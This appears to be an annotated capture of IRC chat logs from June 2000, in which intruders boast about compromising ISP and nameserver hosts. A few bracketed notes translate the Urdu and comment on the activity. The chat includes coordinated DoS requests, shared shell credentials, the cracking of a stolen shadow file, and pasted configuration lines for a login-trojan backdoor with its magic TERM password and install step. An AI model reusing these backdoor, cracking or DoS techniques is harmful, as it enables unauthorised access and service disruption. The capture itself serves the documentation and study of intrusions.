      :J4n3 :; <<>> DiG 8.2 <<>> @system.example.com version.bind chaos txt
      :J4n3 :;
      :J4n3 :;; FROM: gujarat to SERVER: system.example.com 192.168.244.99
      :J4n3 :;; Total query time: 467 msec
      :J4n3 :;; ANSWER SECTION:
      :J4n3 :;; version.bind, type = TXT, class = CHAOS
      :J4n3 :;; QUERY SECTION:
      :J4n3 :;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
      :D1ck :LOL
      :J4n3 :;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :J4n3 :;; got answer:
      :D1ck :I WILL OWN IT
      :J4n3 :;; res options: init recurs defnam dnsrch
      :J4n3 :; (1 server found)
      :J4n3 :; (1 server found)
      :J4n3 :hehe
      :J4n3 :who's this ?
      :D1ck :BWHAHAHAHAHA
      :D1ck :h4r33^
      :D1ck :i`ll own it
      :D1ck :lamer cant even path his box
      :J4n3 :kewl
      :J4n3 :tight
      :J4n3 :kar kar own kar
      :D1ck :heh
      :D1ck :he's such a lamer
      :D1ck :let me reboot
      :D1ck :brb
      :D1ck :brb
      :J4n3 :heh okies
      :D1ck :oye
      :D1ck :u there?
      :J4n3 :yeah
      :D1ck :my NS is getting 43503495-43-593 quries
      :D1ck ::?(
      :D1ck ::(
      :J4n3 :huh
      :J4n3 ::/
      :D1ck :lol
      :J4n3 :what's the chances ?
      :D1ck :100% if my NS is working like yesterday
      :D1ck :shit i think named is dead
      :J4n3 :oh :(
      :D1ck :;; res_nsend to server system.example.com  192.168.244.99: Connection timed out
      :D1ck :som one is dosing em
      :D1ck :or
      :D1ck :some thing is wrong
      :J4n3 :hmmm
      :J4n3 :try later
      :D1ck :k
      :D1ck :system.example.com
      :D1ck :remember
      :D1ck :i will own it tonight
      :J4n3 :yeah
      :J4n3 :sure
      :D1ck ::P
      :D1ck :hurry its important
      :D1ck :
      :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :D1ck 
      :J4n3 :what happened ?? sorry main neechay gaya tha
      :J4n3 :kuch khaanay
      :D1ck :np
      :D1ck :never mind
      :D1ck :yaar
      :D1ck :i was wondering
      :D1ck :when we change login
      :D1ck :admin cant login
      :D1ck :so thats fucked?
      :D1ck :linux
      :D1ck :?
      :J4n3 :hmmm
      :J4n3 :yahi main humesha sochta hon
      :J4n3 :lekin i think aisa nahin hai 
      :J4n3 :unka login chaltha hai
      :D1ck :nope
      :D1ck :it doesnt workl
      :D1ck :i tried
      :J4n3 :what ?? i mean u dont know what admin pass is
      :D1ck :login: dynamic
      :D1ck :Password:
      :D1ck :Login incorrect
      :D1ck :login: dynamic
      :D1ck :Password:
      :D1ck :that sux
      :D1ck :i`m doing it with my box
      :D1ck :send me the root/owned
      :D1ck :let me try that
      :J4n3 :hmm its on linux :/
      :J4n3 :wait wait
      :D1ck :shit
      :J4n3 :try my zippy.example.org
      :D1ck ::(
      :D1ck :oki
      :D1ck :k
      :D1ck :user/pass?
      :J4n3 :user : micr0n
      :J4n3 :pass : ashunkla
      :D1ck :k
      :D1ck :name?
      :D1ck :of the file
      :D1ck :never mind
      :D1ck :brb i have to change their normal login
      :D1ck :brb
      :J4n3 :oye
      :J4n3 :linux.tar hai
      :J4n3 :D1ck 
      :D1ck :J4n3 
      :D1ck :?
      :J4n3 :oye can j0e know the key of K1dd13 ???
      :D1ck :yep
      :D1ck :he can
      :J4n3 :ok thanx :)
      :J4n3 :i trust him 100 % :)
      :D1ck :kewl
      :D1ck :oye 
      :D1ck :dos h4r33
      :D1ck :so i can jupoe him and annoy ircops
      :D1ck :like i always do :
      :D1ck ::P
      :D1ck :and get him glined
      :D1ck :and #delusion is edge of being purge
      :J4n3 :oh yaar i have to lead shell's again, sub band kardeen , sonay ja raha tha, if u say i
      :J4n3 :load again
      :J4n3 :waisay channel #delusion tho pehlay bee purge hogaya tha, benchodon nay dubara layliya
      :D1ck :no
      :D1ck :its ok
      :D1ck ::)
      :D1ck :coz rr did
      :D1ck :rr is my freind
      :D1ck :rr is freinds with danny (the personm who purged it)
      :J4n3 :oh oh
      :J4n3 :kewl
      :D1ck :and diz sucked rr ballz to give him w and he will own his soul to him
      :J4n3 :i wish get it purged
      :D1ck :so rr decided he would help em if he doesnt say lame shit
      :D1ck :so thats what happened
      :J4n3 :ahaaaaan
      :J4n3 :now rr want to purge it again ?
      :D1ck :yep
      :D1ck :he wants to
      :D1ck :but his relations with opes isnt as good as before
      :D1ck :he is trying
      :D1ck :can u dos him with 2 shells plls
      :D1ck ::/
      :D1ck :only 2
      :D1ck :not more
      :J4n3 :hmm kewl :)
      :D1ck ::P
      :D1ck ::P
      :J4n3 :ok wait
      :D1ck :thanks
      :D1ck :thanks
      :J4n3 :naa now i'll load 8 to 10 wait
      :D1ck :hehe
      :D1ck :no no
      :D1ck :jani
      :D1ck :u need 2 shells for diz .xx
      :D1ck ::LP
      :J4n3 :hehe wait naa already loaded 5 
      :D1ck :hehe
      :D1ck :thx
      :D1ck ::)
      :J4n3 :ok what's the iP ?
      :D1ck :hehe
      :D1ck :192.168.1.99
      :J4n3 :hmmm hold on
      :D1ck :ok
      :J4n3 :what's his nick ?
      :D1ck :h4r33
      :D1ck :unet is lagged
      :D1ck :MEWHEHEHE
      :D1ck : Signoff by h4r33
      :D1ck :kewl
      :D1ck ::))))
      :J4n3 :he will go down soooooon
      :D1ck :<T|mm|n8r:#delusion> *** h4r33 has quit IRC (Ping timeout for
      :D1ck :                     h4r33[ns3.example.net.xx])         whats he doing in
      :D1ck :                     the place
      :D1ck :pheared
      :D1ck :
      :J4n3 :fuck i emailed them, but donno the address :/  sent to root  postmaster, support sales help 
      :J4n3 :but donno they got it or not, 
      :D1ck :no man
      :D1ck :i have their main 15 MB PIPE hub
      :D1ck :the whole example depend on
      :J4n3 :kewl
      :D1ck ::P
      :D1ck :yep
      :D1ck :stop it
      :h4r33 ::P
      :J4n3 :wtf ?
      :D1ck :?
      :D1ck :that was me
      :J4n3 :errrrrrrrrr
      :J4n3 :lol
      :D1ck :lol
      :J4n3 :He He He He
      :D1ck ::P
      :J4n3 :oye what's the bnc pass for ns2.example.net ?
      :j0e :uffo ehhe
      :j0e :itnay saray bots
      :J4n3 :hehe
      :D1ck :hey j0e 
      :D1ck :hehe
      :D1ck :hey J4n3 
      :j0e :lol
      :Sp07 :lots of bots
      :D1ck :`im missing 50
      :Sp07 :hehe
      :Sp07 :set up crontab
      :Sp07 :on each one
      :D1ck :.join #7thsphere
      :D1ck :.part #7thsphere 
      :Sp07 :.part #7thsphere 
      :Sp07_ :7th(2k) using ..15cryptonik 14ice 14(15alpha14)
      :Sp07 :d1ck
      :Sp07 :make me a bnc on a fast server =D
      :D1ck :kaos___ nick nameserver
      :D1ck :heh
      :Sp07 :oc3
      :Sp07 :hehe
      :Sp07 :why dont you make some vhosts?
      :Sp07 :with your nameservers
      :Sp07 :hehe
      :Sp07 :K1dd13.timenet.net
      :D1ck :hehe
      :D1ck :Sp07.rooted.his.first.box.from.timenet.net
      :D1ck :hehe
      :Sp07 :hehe
      :D1ck :i`ll point
      :D1ck :later
      :D1ck :its 9 am
      :D1ck :and i dint sleep
      :Sp07 :hehe
      :Sp07 :sleep is for wussies
      :D1ck :kaos__ nick freebsd
      :D1ck :kaos___ nick jin
      :Sp07 :its 9 pm and I still didnt study for this test
      :D1ck :hahahha
      :D1ck :kaos__ nick netb
      :D1ck :kaos___ bbiab
      :D1ck :kaos___ nick bbiab
      :D1ck :.save
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :d1ck you here?
      :D1ck :.join #7thsphere 
      :acidklown
      :txdcc01
      :txdcc01
      :txdcc01
      :txdcc01 Check it out
      :txdcc01
      :txdcc01
      :Gemru^wu
      :Sp07
      :Sp07
      :zmasterz
      :Gemru^wu
      :D1ck :.part #7thsphere 
      :D1ck :.part #7thsphere 
      :Sp07 :thats a lot of bots
      :Sp07 :heh
      :Sp07 :thats a lot of ping timeouts
      :Sp07 :hehe
      :D1ck :.part #7thsphere 
      
      -=-
      
      Day 09 June 12
      
      :Sp07 :wtf?
      :D1ck :dont know
      :Sp07 :G *kaos@211.46.* 960874933 Banned *kaos@211.46.*[60] until Tue Jun 13 06:38:24 2000 [960871104]: too many bots
      :Sp07 :G *kaos@195.231.251.* 960874857 Banned *kaos@195.231.251.*[1] until Tue Jun 13 06:37:08 2000 [960871028]: too many bots
      :Sp07 :thats fucking gay
      :D1ck :yure #7thsphere  freidns
      :D1ck :gling them?
      :ath0_
      :Sp07 :nope
      :Sp07 :it was me
      :Sp07 :
      :Sp07 :jk
      :D1ck :thanks gay
      :D1ck :
      :D1ck ::(
      :Sp07 :#eggdrops people isnt oping me =(
      :Sp07 :yo
      :D1ck :i`m making accounts on local isp 
      :D1ck :for freinds
      :D1ck ::(
      :D1ck :?
      :Sp07 :can you help me dos something?
      :Sp07 :192.168.13.233
      :D1ck :nope
      :D1ck :11 
      :D1ck :and i`m going to bed
      :D1ck :soryr
      :D1ck :sorry
      :D1ck ::)
      :D1ck ::)
      :J4n3 :errrrrrrr
      :D1ck :oye
      :J4n3 :where r all bawts ?
      :D1ck :i have the whole billing system
      :D1ck :glined
      :D1ck :i have the whole billing system of example
      :D1ck :oye
      :D1ck :heh
      :J4n3 :lol
      :J4n3 :glined how ?
      :J4n3 :they didn't have the same ip 
      :J4n3 :billing system of example ??
      :J4n3 :how ? 
      :D1ck :too many bots
      :D1ck :yep
      :D1ck :example ki file
      :D1ck :oye J4n3 
      :D1ck :only elite freinds should get
      :D1ck :like j0e
      :D1ck :and rsnake
      :D1ck :coz then they all give it ot
      :D1ck ::P
      :J4n3 :yeah 
      :D1ck :and we can use it more
      :J4n3 :hmm like ?
      :D1ck ::P
      :J4n3 :lol rnsake
      :J4n3 :Rsnkae
      :D1ck :?
      :D1ck :?
      :D1ck :[root@K1dd13 billing]# ls
      :D1ck :add_hours.sh       monitor.sh~           usage_reporter.sh~
      :D1ck :add_hours.sh~      nms_monitor.sh~       user_bought_hours.sh
      :D1ck :add_user_hours.sh  sum.sh                user_usage_report.sh
      :D1ck :balance_hours.sh   temp.sh~              user_usage_report.sh.old.1
      :D1ck :check_user.sh      time_to_minutes.sh    user_usage_report.sh~
      :D1ck :create_users.sh    update_all_users.sh   user_used_hours.sh
      :D1ck :data               update_user_usage.sh  user_used_hours.sh~
      :D1ck :enabled.sh         usage_reporter.sh
      :D1ck :[root@K1dd13 bin]# ls
      :D1ck :a  delete_users.sh               m   r          set_bin_passwd_shell.sh
      :D1ck :c  get_first_line_and_delete.sh  ma  radius.sh  sync.sh
      :J4n3 :hehe
      :D1ck :[root@K1dd13 monitor_bin]# ls
      :J4n3 :kewl kewl
      :D1ck :monitor.sh  monitor.sh~  start_atrc_nms.sh  start_atrc_nms.sh~
      :J4n3 :oye where is passwd file ?
      :D1ck :[root@K1dd13 passwd_bin]# ls
      :D1ck :text_password_to_des.pl
      :D1ck :[root@K1dd13 passwd_bin]#
      :J4n3 :abay Account add kar na vip phir
      
      Hey why dont you add the VIP account?
      
      :D1ck :hehehe i did
      :J4n3 :oh ye phelay ka copy karliya tha /
      
      oh this has been copied from previous (stuff)
      
      :D1ck :it got deleted
      :J4n3 :oh :(
      :D1ck ::P
      :J4n3 :acha iska passwd file kaha hai ?
      
      Ok where is its passwd file?
      
      :D1ck :oye crack kar
      :D1ck :oye crack kar
      
      Yo crack it
      Yo crack it
      
      :J4n3 :lekin unshadow karna hoga na phir crack hoga
      
      But we will have to unshadow it before cracking it
      
      :D1ck :why do u want it?
      :D1ck :i gave u shadow
      :D1ck :with passwords
      :J4n3 :oh 
      :J4n3 :wait
      :D1ck :;p
      :J4n3 :oye only 126 passes on it ?
      :D1ck :nope
      :D1ck :5438 shadow
      :D1ck :5438
      :J4n3 :errr then why it showing 128 :/
      :D1ck :hehe dunno
      :D1ck ::P
      :J4n3 :nahin nahi sahi hai
      
      no no it is correct
      
      :J4n3 :may be its a error
      :D1ck :oh
      :J4n3 :coz speed is very slow of cracking
      :D1ck :oh
      :J4n3 :agar 126 hothay tho is waqth thak complete hojatha hehe
      
      if there were only 126, it would have completed by this time
      
      :J4n3 :its still on 0 %
      :D1ck :what?
      :D1ck :oh
      :J4n3 :D1ck ka bacha 
      :J4n3 :daal daal kacha
      
      [note: this guy is teasing D1ck - by some colloquial rhyme]
      
      :D1ck :heh
      :D1ck ::/
      :D1ck :koi isp bata
      
      give me some ISPs
      
      :D1ck :jis ko hax0r karo
      
      that we can hax0r
      
      :D1ck :?
      :D1ck :J4n3 
      :D1ck :a prson elite like u
      :D1ck :shouldnt hang in #karachi
      :D1ck ::P
      :D1ck :simple, straight karachi and #dleusion is full of lamers
      :D1ck :heh
      :D1ck :J4n3 
      :D1ck ::P
      :D1ck : /kick J4n3 
      :J4n3 :loool
      :D1ck :seriously ayar
      :D1ck :yaar
      
      yaar = pal
      
      :D1ck :+
      :D1ck :it's h1gh
      :D1ck :who sed so much about u
      :D1ck :./fuck backstabbers
      :D1ck :simple.
      :J4n3 :hahah abay i'm the admin there plus rob hai koi tho elitee hona chaiyee in lamerz main
      
      hahah... hey i am the admin there plus theres someone called "rob" who's wanting to become elite in lamerz main
      
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN
      
      plus my kiddiesssssssssssssss
      plus my kiddiesssssssssssssss
      plus my kiddiesssssssssssssss
      
      :D1ck ::P
      :D1ck :k
      :D1ck ::)
      :D1ck :oye today is 13th july?
      :D1ck :oye today is 13th junbe
      :D1ck :?
      :J4n3 :no
      :J4n3 :12
      :D1ck :oh
      :D1ck :gline 12th ko hatay ga
      
      gline will be removed on 12th
      
      :J4n3 :june
      :J4n3 :hmm
      :J4n3 :it meanz aaj raatjh ya kal
      
      it means either tonight or tomorrow
      
      :J4n3 :coz 
      :J4n3 :states main abi 11 haI
      
      because in the states (US) it is still 11
      
      :D1ck :shit
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :zeeshan_S
      :zeeshan_S
      :D1ck :k-rad- say KEWL
      :k-rad- :KEWL
      :D1ck :le say KEWL
      :le :KEWL
      :D1ck :hey J4n3 
      NICK pencil
      USER werd . . :DoS
      
      NOTICE AUTH :*** Looking up your hostname
      NOTICE AUTH :*** Checking Ident
      NOTICE AUTH :*** No ident response
      NOTICE AUTH :*** Found your hostname
      :graz.at.Eu.UnderNet.org 465 pencil : use another server.
      ERROR :Closing Link: pencil by graz.at.Eu.UnderNet.org (K-lined)
      NICK pencil
      USER werd . . :DoS
      :D1ck :i tried a login trojan
      :Sp07 :yah
      :D1ck : /bin/login
      :D1ck :when n i change it
      :D1ck :the admin cant acess the box?
      :D1ck :i was thinking this the other day
      :Sp07 :of course they can
      :D1ck :they admin cant access the box?
      :D1ck :no
      :Sp07 :what does the trojan do?
      :D1ck :i tried it
      :Sp07 :yes they can
      :Sp07 :depends on what the trojan does
      :D1ck :in my own box
      :Sp07 :like I use the bj trojan
      :D1ck :i cp -f login.trojan /bin/login
      :Sp07 :the admin will still be able to login
      :D1ck :no
      :D1ck :oh
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :send me bj.c
      :D1ck :#@$
      :Sp07 :I dont got it
      :Sp07 :hehe
      :Sp07 :hold on let me check for it somewhere
      :D1ck :#@$
      :D1ck :ok
      :Sp07 :I do have it
      :Sp07 :hehe
      :D1ck :PLEASE GET ME
      :D1ck ::)
      :Sp07 :you know how to use it right?
      :D1ck :welp
      :D1ck :may login trojans dont work
      :D1ck :i tried like 7-8
      :D1ck :and that sucks
      :D1ck :ofcourse
      :D1ck :TERM=pass
      :D1ck :telnet owned.com
      :D1ck :bash#
      :D1ck :uname -a;id
      :D1ck :root root root
      :D1ck :heh
      :Sp07 :make you change the pass for each box you own
      :Sp07 :make sure you change the pass for each box you own
      :Sp07 :accept
      :Sp07_ :accept it
      :Sp07_ :hurry I got to eat breakfast soon
      :D1ck :k
      :D1ck ::P
      :Sp07_ :umm
      :Sp07 :#define SHELL "/bin/sh"
      :Sp07 :#define SHELL_CALLME "login"
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :#define LOGIN_CALLME "login"
      :Sp07 :#define ENV_NAME "TERM"
      :Sp07 :#define ENV_VALUE "rh6ps0"
      :Sp07 :#define ENV_FIX "vt100"   
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :#define LOGIN "/usr/bin/xcat"
      :Sp07 :for that
      :Sp07 :you have to move the old login there
      :Sp07 :cp /bin/login /usr/bin/xcat
      :Sp07 :#define ENV_VALUE "rh6ps0"
      :Sp07 :and thats the password right there
      :D1ck :oh
      :Sp07 :change it for each box you own
      :D1ck :why?
      :D1ck :why?
      :Sp07 :cause someone can hack one of your boxes
      :Sp07 :and get the password
      :Sp07 :got to go eat
      :Sp07 :brb
      :D1ck :i have 100+
      :D1ck :i change for each box?
      :D1ck :nohup_ say hehe
      :Sp07 :fix my dick ho
      :D1ck :nohup  say heh
      :nohup :heh
      :D1ck :nohup userlist
      :Sp07 :nohup act suck Sp07 dick
      :Sp07 :do that
      :Sp07 :do that
      :Sp07 :do that
      :D1ck :nohup Sp07=/dev/null
      :D1ck :[nohup(dcc)] [23:39] (D1ck) linking Sp07 to /dev/null
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :nohup_
      :D1ck :nohup_ say hehe
      :D1ck :nohup___ say hehe
      :Sp07 :ADD DISEASE * DISEASE 10000000000
      :Sp07 :mwuahhaha
      :D1ck :hahaha
      :D1ck :i own u
      :desire
      :D1ck :nohup____ say heh
      :nohup_
      :nohup__
      :D1ck :nohup____ say hehee
      :D1ck :HPUX  say hi
      :D1ck :Sp07 
      :D1ck :what date is it in the us?
      :D1ck :12?
      :D1ck :
      :D1ck :13?
      :Sp07 :I dont know
      :Sp07 :hehe
      :D1ck :coz my glined will be off 
      :Sp07 :let me go check
      :D1ck :13
      :D1ck ::(
      :D1ck :no
      :D1ck :seriously
      :D1ck :?
      :Sp07 :12
      :D1ck :shit
      :D1ck :fuck
      :D1ck :FUCK GRID
      :D1ck :dosing
      :D1ck ::(
      :Sp07 :uh hu hu hu hu huh
      :Sp07 :shutup beavis
      :D1ck :man
      :D1ck :i want to own 45329543294093249-3954395495-9340593-95r34-95-2349959234-593-49534-95-4395-349542-93
      :D1ck ::P
      :D1ck :Sp07 
      :D1ck :ACTION fingers Sp07 
      :D1ck :ACTION fingers Sp07's pussy
      :D1ck :u are a girl Sp07 ?
      :D1ck :right?
      :Sp07 :NIO
      :Sp07 :NO
      :Sp07 :when I say suck my dick
      :Sp07 :what do you think I mean?
      :Sp07 :hehe
      :D1ck :HEH
      :D1ck :ehhe
      :D1ck :hehe
      :D1ck :i lost ns2.example.net
      :D1ck ::(
      :D1ck :coz of diz
      :D1ck :well
      :D1ck :he tried 32094-249-23 bad logins
      :Sp07 :=(
      :Sp07 :dont you run sniffers?
      :Sp07 :oh yea
      :Sp07 :its that 1
      :D1ck :i rooted it btw
      :D1ck :the BIG PALACE HUB
      :D1ck :FOR MORE TEN 32409182390408 CLIENTS
      
      [note: well I wonder who these guys are - that whole country must be in an outage
       because they dont have very many pipes going in and out of there]
      
      :D1ck :IT WAS A 15 MB PIPE
      :D1ck :well
      :Sp07 :A PIPE
      :D1ck :2000000 MB
      :Sp07 :2 gigabytes?
      :Sp07 :or wait
      :Sp07 :i cant count
      :Sp07 :hehe
      :D1ck :but man
      :Sp07 :too blurry
      :D1ck :it was fast
      :Sp07 :uh huh
      :Sp07 :he owned you?
      :D1ck :no
      :D1ck :h4r33 and own me
      :D1ck :hehe
      :D1ck :diz == script kids
      :D1ck :diz == script kid
      :D1ck :he cant even code
      :D1ck :or read shell codes
      :D1ck :if i send him a trojan
      :Sp07 :hahaha
      :Sp07 :he will use it?
      :D1ck :shell code directed to 127.0.0.1
      :D1ck :he will use it
      :D1ck :hahaha
      :Sp07 :just like you used my bj.c
      :Sp07 :and now I owned you
      :Sp07 :hahahha
      :Sp07 :j/k
      :Sp07 : =)
      :Sp07 :?
      :Sp07 :what happened?
      :D1ck__
      :D1ck :what was my quit?
      :D1ck :what was my quit?
      :Sp07 :didnt you see it?
      :Sp07 :hahaha
      :Sp07 :you came in
      :Sp07 :[09:52] *** D1ck__ (~dynamic@orff.example.net) has joined 
      :Sp07 :[09:52] *** inetd-s sets mode: +o D1ck__
      :Sp07 :[09:52] <Sp07> ?
      :Sp07 :[09:52] *** D1ck has quit IRC (Read error to D1ck[orff.example.net]: Connection reset by peer)
      :D1ck :what was my quit?
      :D1ck :what was my quit?
      :D1ck :oh
      :D1ck : SignOff D1ck: #botsex,#lecole,#Linuxsex,&partyline (Read error to
      :D1ck :          D1ck[orff.example.net]: Connection reset by peer)
      :Sp07 :hahahahahaha
      :Sp07 :=D
      :D1ck ::)
      :D1ck :did u hack me
      :D1ck :and killall -9 BitchX?
      :D1ck ::(
      :D1ck :Sp07 HACKE DME
      :D1ck :ME
      :D1ck :i am scanning 216.55
      :Sp07 :?
      :Sp07 :did you see what I said before you quit?
      :D1ck
      :D1ck :nope
      :D1ck :what did u sya?
      :Sp07 :[09:50] <Sp07> just like you used my bj.c
      :Sp07 :[09:50] <Sp07> and now I owned you
      :Sp07 :[09:50] <Sp07> hahahha
      :Sp07 :[09:50] <Sp07> j/k
      :Sp07 :[09:50] <Sp07>  =)
      :D1ck :oh
      :D1ck :yep
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> just like you used my bj.c
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> and now I owned you
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> hahahha
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07> j/k
      :Sp07 :[09:54] <Sp07> [09:50] <Sp07>  =)
      :D1ck :hehehe
      :D1ck :IRIX say heh
      :IRIX :heh
      :Sp07 :did yo hack irix?
      :D1ck :no
      :D1ck :its a bot
      :D1ck :from redhat
      :Sp07 :hehehe
      :D1ck :=P
      :D1ck :dude
      :D1ck :if u give me lodgic
      :D1ck :of finding IRIX
      :D1ck :i`ll make my own scanner
      :D1ck :but
      :D1ck :i need some sort of a hint
      :D1ck :i never used IRIX before, except for once
      :Sp07 :if I give you what?
      :D1ck :hint
      :Sp07 :hint?
      :D1ck :heh
      :D1ck :never mind
      :D1ck :let me check my jp.log
      
      [note: jp.log seems to be a list of hosts from Japan, xx.log where xx is a TLD]
      
      :D1ck :heh
      :D1ck :in couple of weeks
      :Sp07 :ok
      :D1ck :unet will gline
      :D1ck :*
      :D1ck :and
      :D1ck :*
      :D1ck :ll
      :D1ck :lol
      :Sp07 :heh
      :D1ck :=P
      :D1ck :i`ll make a script ./script roots.txt
      :D1ck :it will check bj on all boxes
      :D1ck :if true
      :D1ck :then it will keep if not it will grep -v
      :D1ck :it will be easier
      :D1ck :hehe
      :Sp07 :umm
      :Sp07 :whats the point if you dont know the bj password?
      :Sp07 :hehe
      :D1ck :i know
      :D1ck :its my bj
      :D1ck ::P
      :Sp07 :oh
      :D1ck :<syntax3> like i`d sugest,a admin should always find .kr* .jp.log, coz hackers uslly scan that, and it's quite possible that if u find such log u are vuln.
      :D1ck :THATS LAME
      :D1ck :i just got that from my quotes.txt
      :D1ck :Sp07 
      :D1ck :u have CERT KEY
      :D1ck :?
      :Sp07 :cert key ?
      :Sp07 :for what?
      :Sp07 :anyways no
      :Sp07 :eheh
      :Sp07 :I dont have anything 
      :Sp07 :only thing I have is my pride
      :D1ck :lol
      :D1ck :m4d 3l337 tr0j4n by d1ck
      :Sp07 :change your bj password
      :Sp07 :for each shell
      :D1ck :why?
      :Sp07 :cause if 1 of your shells get hacked
      :D1ck :its easy to sniff
      :D1ck :?
      :Sp07 :people can find out the bj password
      :Sp07 :no
      :Sp07 :people can hack your shell and find out your password
      :D1ck :how?
      :D1ck :TERM
      :D1ck :TERM????
      :D1ck :HOW
      :D1ck :?
      :Sp07 :uhh
      :Sp07 :just view /bin/login
      :Sp07 :let me on your shell
      :Sp07 :and I will find out your password
      :Sp07 :hehe
      :D1ck :hehe
      :D1ck :oh
      :D1ck :the codder sux
      :D1ck :he should have crypted it
      :D1ck :so no hex editors could read it
      :Sp07 :type 
      :Sp07 :more /bin/login
      :Sp07 :and look throught it
      :Sp07 :and you will se your password
      :Sp07 :like TERM=
      :Sp07 :password
      :Sp07 :or something
      :D1ck :oh
      :D1ck :kewl
      :D1ck :******** /bin/login: Not a text file ********
      :Sp07 :?
      :D1ck :with more u cant view binaries
      :D1ck ::P
      :Sp07 :yes you can
      :D1ck :no
      :Sp07 :# more /bin/login
      :Sp07 :ELF     (4]4 (44sstt</usr/lib/ld.so.15
      :Sp07 :@(6 %4<&*/;,?9:1-'378#"5>2
      :Sp07 :)0$.=<\h       (       
      :Sp07 :, $,4   ($PH:t^LP
      :Sp07 :V\]hbiq(w  }
      :Sp07 :--More--(5%)  
      :Sp07 :hehe
      :D1ck :heh
      :Sp07 :its in there
      :Sp07 :in all that junk
      :D1ck :i cant
      :Sp07 :on that shell you cant
      :Sp07 :cause its gay
      :Sp07 :hehe
      :D1ck :cat 
      :D1ck :?
      :Sp07 :yeah
      :D1ck :hehe
      :D1ck :k
      :Sp07 :you can use cat
      :Sp07 :cat /bin/login | more
      :Sp07 :do that
      :Sp07 :heeh
      :D1ck :k
      :D1ck :whats TERMTYPE for ansi?
      :D1ck :i forgot
      :D1ck :vt100
      :D1ck :is normal
      :D1ck :ani
      :D1ck :??
      :Sp07 :?
      :Sp07 :vt100
      
      -=-
      
      Day 10 June 13
      
      :D1ck :noo
      :D1ck :hrm
      :Sp07 :i dont know
      :Sp07 :vt200?
      :Sp07 :vt102
      :Sp07 :ansi
      :Sp07 :type in ansi
      :D1ck :hrm
      :Sp07 :for termtype
      :Sp07 :ehhe
      :D1ck :hehe
      :D1ck :w00p u leaked my pass
      :D1ck ::P
      :Sp07 :?
      :D1ck :j/k
      :Sp07 :let me on your shell
      :Sp07 :I will find your pass
      :D1ck :it's ok
      :D1ck ::)
      :D1ck :jp is leet
      :D1ck :un ownable
      :Sp07 :japane?
      :D1ck :yeah
      :D1ck :hehe
      :D1ck :hry
      :D1ck :hey
      :D1ck :i owned one
      :D1ck :kekekke
      :D1ck :ACTION suspects Sp07  is a fed
      :D1ck :well
      :D1ck :can a fed bust me?
      :D1ck :no
      :D1ck :?
      :D1ck :bbl
      :D1ck :sleep
      :D1ck :10 in morning here
      :D1ck :sleeps
      :D1ck ::)
      :D1ck :ACTION is away: (sleep) [BX-MsgLog On]
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :kaos_ nick rhtc
      :D1ck :nohup_ nick industrial
      :D1ck :J4n3 
      :D1ck :ACTION is away: (sleeps) [BX-MsgLog On]
      :Sp07 :you got any legit shells?
      :D1ck :nope
      :D1ck :CHAO
      :D1ck :sleeping
      :J4n3
      :J4n3
      :D1ck :nohup_ nick PHAT
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :nohup_ nick PHAT6
      :Sp07 :phat6 nick dicksuck
      :m4ry :sigh
      :m4ry :LOG THIS
      :dinto :hey d1ck
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :dinto :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :.join #
      :D1ck :.part
      :D1ckhack :.join #k1dd13 cafe2
      :D1ckhack :.join #k1dd13 cafe2
      :D1ckhack :.join #k1dd13 
      :D1ckhack :.part
      :D1ck :dos save
      :Sp07 :
      :D1ck :?
      :Sp07 :@
      :bitch :ho
      :h4r33 :take over
      :D1ck :(h4r33/
      :D1ck :host-l: No such nick
      :D1ck :h4r33: No such nick
      :D1ck : Signon by h4r33
      :D1ck :(h4r33/
      :D1ck :host-l: No such nick
      :D1ck :h4r33: No such nick
      :D1ck :wtf
      :D1ck :?
      :Sp07 :hehehe
      :Sp07 :#k1dd13 = -n
      :D1ck :ph3w
      :Sp07 :gwwgww
      :Sp07 :gheheh
      :Sp07 :ehe
      :Sp07 :he
      :D1ck :hey
      :D1ck :check if kaos@211.46
      :D1ck :is klined
      :D1ck :from atlatna
      :D1ck :and
      :D1ck :stuff
      :D1ck :?
      :Sp07 :nope
      :Sp07 :dont think it is
      :D1ck :why arnt the bots up?
      :D1ck :all running ./mech
      :D1ck :i checked
      :Sp07 :dunno
      :Sp07 :there was some bug
      :Sp07 :on some emech versino
      :Sp07 :where it wouldnt reconnect to servers
      :Sp07 :but that was long ago
      :Sp07 :when I used to use emechs
      :D1ck :no
      :D1ck :i have the new one
